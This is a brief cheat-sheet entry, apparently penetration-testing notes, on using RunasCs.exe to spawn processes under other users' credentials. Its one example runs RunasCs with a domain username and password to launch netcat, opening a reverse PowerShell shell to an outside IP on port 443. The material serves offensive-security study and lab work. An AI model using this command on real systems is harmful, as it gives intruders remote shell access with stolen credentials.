Spawn Processes as Other Users
RunasCs.exe
Project GitHub
https://github.com/antonioCoco/RunasCs/releases
Example Usage
Spawn Process with Network Credentials
# -l 8 : logontype 8 (NetworkCleartext)
# Launch reverse PowerShell session over Netcat socket
.\RunasCs.exe -d domain.tld -l 8 'username' 'password' 'C:\Windows\Temp\nc.exe 10.6.6.6 443 -e powershell.exe'